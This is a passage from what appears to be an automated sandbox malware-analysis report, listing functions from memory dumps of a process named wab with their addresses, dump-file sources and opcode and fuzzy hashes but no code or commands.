                                                • Instruction ID: 7ba9ae5fbe0647c9420beaa8971acd7219c3fbb9761a1e9a6e0300f715395fda
                                                • Opcode Fuzzy Hash: e1ab365e94ba93a764e5af1490bc82899fefd4ac00f8cb4f159b9a465341bd4a
                                                • Instruction Fuzzy Hash: D0D1BD74E01218CFDB15DFA9C984B9DBBB2BF89300F2080AAD909AB354DB355E85DF51
                                                Function 27782758 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 59172a2100cb6b4885f68ab4ff624fab5199a9d5e1e88790858475beb9033c8d
                                                • Instruction ID: c39dce52cf034c7065171c8a7ac4be36aa87f4b26be82ac5a075888f7aee6eef
                                                • Opcode Fuzzy Hash: 59172a2100cb6b4885f68ab4ff624fab5199a9d5e1e88790858475beb9033c8d
                                                • Instruction Fuzzy Hash: CEC1AD74E01218CFEB14DFA5C984B9DBBB2BF89301F1080A9D809AB354DB359E85DF51
                                                Function 27780D48 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c729b0c3ec35df9b29c187f78508cdbb20b958af8396c4cf698412010d78f611
                                                • Instruction ID: 8f89285fb180e22b84363e4b839f2b411f0ea579c7f959ff2de0344dfaa9dc27
                                                • Opcode Fuzzy Hash: c729b0c3ec35df9b29c187f78508cdbb20b958af8396c4cf698412010d78f611
                                                • Instruction Fuzzy Hash: 60C19E74E01218CFEB14DFA5C994B9DBBB2BF89300F1081AAD809AB355DB359E85DF50
                                                Function 27785328 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 27ef37b5a3dcf9588a98c404ad4394485e04481f57e58bd3fdffb45b35da3231
                                                • Instruction ID: 625cdd7d54734d808f5ac4ece16d75153983f414a038206497dde2cd457a5246
                                                • Opcode Fuzzy Hash: 27ef37b5a3dcf9588a98c404ad4394485e04481f57e58bd3fdffb45b35da3231
                                                • Instruction Fuzzy Hash: B9C1AE74E01218CFEB14DFA5C994B9DBBB2BF89300F2080A9D809AB355DB359E85DF50
                                                Function 27787720 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e226b26f9bc5b8f3374c72220209c589d32813123a0dcf7be326cd4467ce3247
                                                • Instruction ID: 92930ed8593914cabfb7a413b147a2e1b5a4fbcf140ea55c1d53d88adfb37d95
                                                • Opcode Fuzzy Hash: e226b26f9bc5b8f3374c72220209c589d32813123a0dcf7be326cd4467ce3247
                                                • Instruction Fuzzy Hash: 27C1AF74E01218CFEB14DFA5C994B9DBBB2BF89300F1081A9D809AB355DB359E85DF50
                                                Function 27782300 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d9ebaebfb30bbeedc3a7d0af94a9077e65b6ffba6388eb9ede31a15d025d4ae
                                                • Instruction ID: 9decef907bd1bbaa56912d9e5e836ea342f64b52fd157bc916c206f856371f75
                                                • Opcode Fuzzy Hash: 5d9ebaebfb30bbeedc3a7d0af94a9077e65b6ffba6388eb9ede31a15d025d4ae
                                                • Instruction Fuzzy Hash: 90C1AF74E01218CFDB14DFA5C994B9DBBB2BF89301F2080AAD809AB354DB359E85DF50
                                                Function 277815F8 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ecce8ffa34d7f0175adcb2acafb67e8d21b29ceee9ddd03d781cdaf1014a93d0
                                                • Instruction ID: 280841b92fb114ab2ecd4fb713eb43f054a520d076b9ba2a79b22298e9d856d9
                                                • Opcode Fuzzy Hash: ecce8ffa34d7f0175adcb2acafb67e8d21b29ceee9ddd03d781cdaf1014a93d0
                                                • Instruction Fuzzy Hash: 40C19E74E01218CFEB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB359E85DF51
                                                Function 27785BD8 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d89ed9740a5795fe3c9b98f30ffb22311a579caf318a6f2712fc401f8dc8b65
                                                • Instruction ID: 774f42ed5ae8b97fb73a15e3ab8fa8a202ce1ae296d0e5f5aa19347617541cb1
                                                • Opcode Fuzzy Hash: 3d89ed9740a5795fe3c9b98f30ffb22311a579caf318a6f2712fc401f8dc8b65
                                                • Instruction Fuzzy Hash: B3C1AE74E01218CFEB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB359E85DF51
                                                Function 27782BB0 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e12d818e5c32258fb5ff09e8972b4f8f3956653b6e2ba772cd323b3005965b5
                                                • Instruction ID: 5b13cd6dc75779cdd4f068afbd6e9385554669d34ab1533ebb584b954b413aa0
                                                • Opcode Fuzzy Hash: 3e12d818e5c32258fb5ff09e8972b4f8f3956653b6e2ba772cd323b3005965b5
                                                • Instruction Fuzzy Hash: B2C19F74E01218CFEB14DFA5C994B9DBBB2BF89301F1080AAD809AB355DB359E85DF50
                                                Function 277811A0 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bffa3c607e72060134f9549b647c101bb4a11f4778465187b98215c4d71b484c
                                                • Instruction ID: 998dd94d5dd977cf15ca25b61fb7362e8ae24b31754103da61902e451800103c
                                                • Opcode Fuzzy Hash: bffa3c607e72060134f9549b647c101bb4a11f4778465187b98215c4d71b484c
                                                • Instruction Fuzzy Hash: 4BC1AD74E01218CFEB14DFA5C984B9DBBB2BF89300F1081AAD809AB354DB359E85DF51
                                                Function 27785780 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 66e8cd978bbcbe6fed1e0cb6a560ceb6e32e10169dda1d8c1dff87c1cd1ff946
                                                • Instruction ID: 780d0a75d8c2ea63ed667c5eadb7d8eafd9c755643e7bd09726c9ce02bcd9eaf
                                                • Opcode Fuzzy Hash: 66e8cd978bbcbe6fed1e0cb6a560ceb6e32e10169dda1d8c1dff87c1cd1ff946
                                                • Instruction Fuzzy Hash: A2C19E74E01218CFEB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB359E85DF50
                                                Function 27784A78 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 61a83111e133a80ac951bf6c3daf8ae789841220dc74c9eb2f310787d88ede59
                                                • Instruction ID: ddfef00f5a3567d7dd9bfb40e6ddc5eb00efdfbf5d3b1c9c3f2fda60f21832d1
                                                • Opcode Fuzzy Hash: 61a83111e133a80ac951bf6c3daf8ae789841220dc74c9eb2f310787d88ede59
                                                • Instruction Fuzzy Hash: FEC1AE74E01218CFEB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB759E85DF50
                                                Function 27786E70 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb8e4c6005c57faa029d06d44cdd5e89868f11e3f3acfad2d68d14ae8beb3e31
                                                • Instruction ID: 5ef5aa697a347ff5cd61fae803670cf8c754dfc858f66c814f822088b92bfb15
                                                • Opcode Fuzzy Hash: fb8e4c6005c57faa029d06d44cdd5e89868f11e3f3acfad2d68d14ae8beb3e31
                                                • Instruction Fuzzy Hash: 60C19F74E01218CFEB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB359E85DF51
                                                Function 27783460 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4111bf02d7aad53e2a20d0f77c2b8c57ef97170d00f59e14b824b94aa34974e
                                                • Instruction ID: a702a784b1cf13d118820046110f38fe3bd90029c4dcb9175de6fbf14a73088e
                                                • Opcode Fuzzy Hash: d4111bf02d7aad53e2a20d0f77c2b8c57ef97170d00f59e14b824b94aa34974e
                                                • Instruction Fuzzy Hash: 4DC1A074E01218CFDB14DFA9C994B9DBBB2BF89300F1080A9D809AB355DB359E85DF51
                                                Function 27781A50 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cd8aa0a7d8218647264293b4357c4049be86f3bcabc3d40721415afde5c878e6
                                                • Instruction ID: 15be1b4ca7606724b4fcdfb6af328a805935e3cbd4c580022327b2e35e90058c
                                                • Opcode Fuzzy Hash: cd8aa0a7d8218647264293b4357c4049be86f3bcabc3d40721415afde5c878e6
                                                • Instruction Fuzzy Hash: 6EC19D74E01218CFEB14DFA5C994B9DBBB2BF89301F1080AAD809AB355DB359E85DF50
                                                Function 27780040 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e37530b376aa10f1878141595af792414f281862916baa9e86ca08bfcaabff06
                                                • Instruction ID: 8ea93ca44a1432d59b1e4031b16d97cbff05aca1d31304195ab1f313b835ab99
                                                • Opcode Fuzzy Hash: e37530b376aa10f1878141595af792414f281862916baa9e86ca08bfcaabff06
                                                • Instruction Fuzzy Hash: 2CC1AE74E01218CFEB14DFA5C994B9DBBB2BF89300F1081AAD809AB355DB359E85DF50
                                                Function 27786030 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a728d23d51c45d1b4ccb55aefe6f4e97a57ff9a2f429478c1a9f3f4ef884f58
                                                • Instruction ID: bb9e5e95d76c23d3c35d0fa22e0b15331d1e6bb1e5b39b8b2d95432c032d1401
                                                • Opcode Fuzzy Hash: 4a728d23d51c45d1b4ccb55aefe6f4e97a57ff9a2f429478c1a9f3f4ef884f58
                                                • Instruction Fuzzy Hash: 59C19F74E01218CFEB14DFA5C994B9DBBB2BF89300F1080A9D809AB355DB359E85DF51
                                                Function 27784620 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9198dd79913c90e32e29b6b8a69afe195f117029691bc3366d1720f8c5a18123
                                                • Instruction ID: e45820fde338ac414598304174191466ff40e0cbc36b0e2e9581796bd3e556a8
                                                • Opcode Fuzzy Hash: 9198dd79913c90e32e29b6b8a69afe195f117029691bc3366d1720f8c5a18123
                                                • Instruction Fuzzy Hash: BBC1AE74E01218CFEB14DFA5C984B9DBBB2BF89300F1080AAD809AB355DB359E85DF51
                                                Function 27786A18 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 90ae83e350165fe84d183c9621f9fc032df1d4e0020f7c82f3921413f82f7d48
                                                • Instruction ID: 843a4ff03b9dba80ef45072958340a86bcab680fa31c74a15f91620bafd1d6f9
                                                • Opcode Fuzzy Hash: 90ae83e350165fe84d183c9621f9fc032df1d4e0020f7c82f3921413f82f7d48
                                                • Instruction Fuzzy Hash: 44C1AF74E01218CFDB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB359E85DF51
                                                Function 277808F0 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b05eb451b577d5f3e691eebfaf7ea26b9b6f06bebacad3e6eff7b258556c221
                                                • Instruction ID: c80ff839e2a665c8f0f824601b89de082452694c7f6a2252ecae84b8d626f835
                                                • Opcode Fuzzy Hash: 5b05eb451b577d5f3e691eebfaf7ea26b9b6f06bebacad3e6eff7b258556c221
                                                • Instruction Fuzzy Hash: FFC1AE74E01218CFEB14DFA5C994B9DBBB2BB89300F2081A9D809AB355DB359E85DF50
                                                Function 27784ED0 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d3acceca35a79693b0c3b9ac9a4ae2c124413dd10037def4b679682affbf6f6c
                                                • Instruction ID: 0ae1f352643e3dddf8ecce78b24637ad14108119efc93af218d339a617965ed2
                                                • Opcode Fuzzy Hash: d3acceca35a79693b0c3b9ac9a4ae2c124413dd10037def4b679682affbf6f6c
                                                • Instruction Fuzzy Hash: CAC19E74E01218CFEB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB359E85DF51
                                                Function 277872C8 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7e7d90b0b27003b0a642fe322f114fac45553ca610d416af9880c6a5841f4f5e
                                                • Instruction ID: 04b9de09495cf071957f1e717ddd2acc3a4208258bbb537a9a78e9f0253875bf
                                                • Opcode Fuzzy Hash: 7e7d90b0b27003b0a642fe322f114fac45553ca610d416af9880c6a5841f4f5e
                                                • Instruction Fuzzy Hash: 20C1AE74E01218CFEB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB359E85DF50
                                                Function 27781EA8 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8fd135f702c2590d14612169c73be7bb3b8baf484ecf65b203b9450d00ef3462
                                                • Instruction ID: 915dcf77ae85a08ba70b92753e60306126a1d195b980bf7035fa4b4b64419d9c
                                                • Opcode Fuzzy Hash: 8fd135f702c2590d14612169c73be7bb3b8baf484ecf65b203b9450d00ef3462
                                                • Instruction Fuzzy Hash: 2AC1AF74E01218CFDB14DFA5C984B9DBBB2BF89301F2080AAD809AB355DB359E85DF50
                                                Function 27780498 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14fe39ceac573eca556ff166eabd2fe84ecea815b29e9940d264c631cdaac4a2
                                                • Instruction ID: be2625ab9c1d52a4036e3ba369a6c346540eae07ec0d844dc92d144fd557793f
                                                • Opcode Fuzzy Hash: 14fe39ceac573eca556ff166eabd2fe84ecea815b29e9940d264c631cdaac4a2
                                                • Instruction Fuzzy Hash: 89C1AD74E01218CFEB14DFA5C994B9DBBB2AB89300F2081A9D809AB355DB359E85DF50
                                                Function 27786488 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f55788e1eaccd8a9634b4ca5bdb11b683966616226743c17249d283fbb076aed
                                                • Instruction ID: e920dcaab1d51ee6cc05ace6588bf73d3a535f60f76eba96858ea3eb8c3ad2f9
                                                • Opcode Fuzzy Hash: f55788e1eaccd8a9634b4ca5bdb11b683966616226743c17249d283fbb076aed
                                                • Instruction Fuzzy Hash: 00C19E74E01218CFEB14DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85DF50
                                                Function 0251F804 Relevance: .3, Instructions: 265COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 98b436f0cf16c0eeaaaed2eeee786ae8f40c0fb5c785503e6148a91acfb30df9
                                                • Instruction ID: 6617cb32ac65e2a03906af9b51f8628c4539658ca6e2803e4ad077b300b64551
                                                • Opcode Fuzzy Hash: 98b436f0cf16c0eeaaaed2eeee786ae8f40c0fb5c785503e6148a91acfb30df9
                                                • Instruction Fuzzy Hash: 9CC18E74E01318CFEB14DFA5C994B9DBBB2BB89300F1081A9D809AB355DB359E85CF51
                                                Function 2778308E Relevance: .2, Instructions: 230COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29b29477140dc55ac9b84f4663ff66dac2b19d7659d807bb430eae46ec796f98
                                                • Instruction ID: 6da0d99dfd94cb083de16d1f704a8754e3dd47e8f44ad289d442d085bccab28a
                                                • Opcode Fuzzy Hash: 29b29477140dc55ac9b84f4663ff66dac2b19d7659d807bb430eae46ec796f98
                                                • Instruction Fuzzy Hash: CAB1AF74E01318CFDB54DFA4C984B9DBBB2BB89300F2080AAD809A7355DB35AE85DF50
                                                Function 0251F150 Relevance: .1, Instructions: 148COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 406fd6d4ee6b8234cb0ea9ac6a45118401c534d3b4597ca69207b4917a8b7341
                                                • Instruction ID: f6c71b3093eb9b123f726df81ca0cfa067a252c6fa20d07f9ede3f7068e32244
                                                • Opcode Fuzzy Hash: 406fd6d4ee6b8234cb0ea9ac6a45118401c534d3b4597ca69207b4917a8b7341
                                                • Instruction Fuzzy Hash: 5B515A74D00208CBEB08DFA9C9447EDBBB2FF88304F10C125D414AB694D7799985CF98
                                                Function 0251F33C Relevance: .1, Instructions: 146COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 044aebe5112a52f49c8cd878da5da6ff5ee1776f7e3b9a3b4dc85ad2cc126d74
                                                • Instruction ID: c055681995f8f57e4fc776bdec3b5bdb0f144fc20d7702443a1b4e4645be31ba
                                                • Opcode Fuzzy Hash: 044aebe5112a52f49c8cd878da5da6ff5ee1776f7e3b9a3b4dc85ad2cc126d74
                                                • Instruction Fuzzy Hash: 3D510574E01308CFEB14DFA8C584BEDBBB2FB89304F248519D415AB694D7799981CF58
                                                Function 2778AC8B Relevance: .1, Instructions: 98COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e19e429094f32b6a85c5506fac5bba13e1b1babf02cedde6a9cf6e4f316f396
                                                • Instruction ID: 21504eb05b2e35df318cca1a0f7e960e1775a09e3dac6c7361771a51761ca3ee
                                                • Opcode Fuzzy Hash: 0e19e429094f32b6a85c5506fac5bba13e1b1babf02cedde6a9cf6e4f316f396
                                                • Instruction Fuzzy Hash: 6B41CEB4D02219DFDB00DFA4D594BAEBBF2AF49301F1454A9E814BB390D7399A44CF94
                                                Function 2778AC90 Relevance: .1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aa5cac72174c4bd931ad83aded5e7ef3b5c27132edbe1740940a2d110646b515
                                                • Instruction ID: d2c8dafbf7148910a7939a0289bbcd4cf30affa21b7428fd46fcbe203f90fe96
                                                • Opcode Fuzzy Hash: aa5cac72174c4bd931ad83aded5e7ef3b5c27132edbe1740940a2d110646b515
                                                • Instruction Fuzzy Hash: BE41DFB4D02219DFCB00CFA4D594BAEBBF2AF49301F1454A9D414BB390D7399A44CF94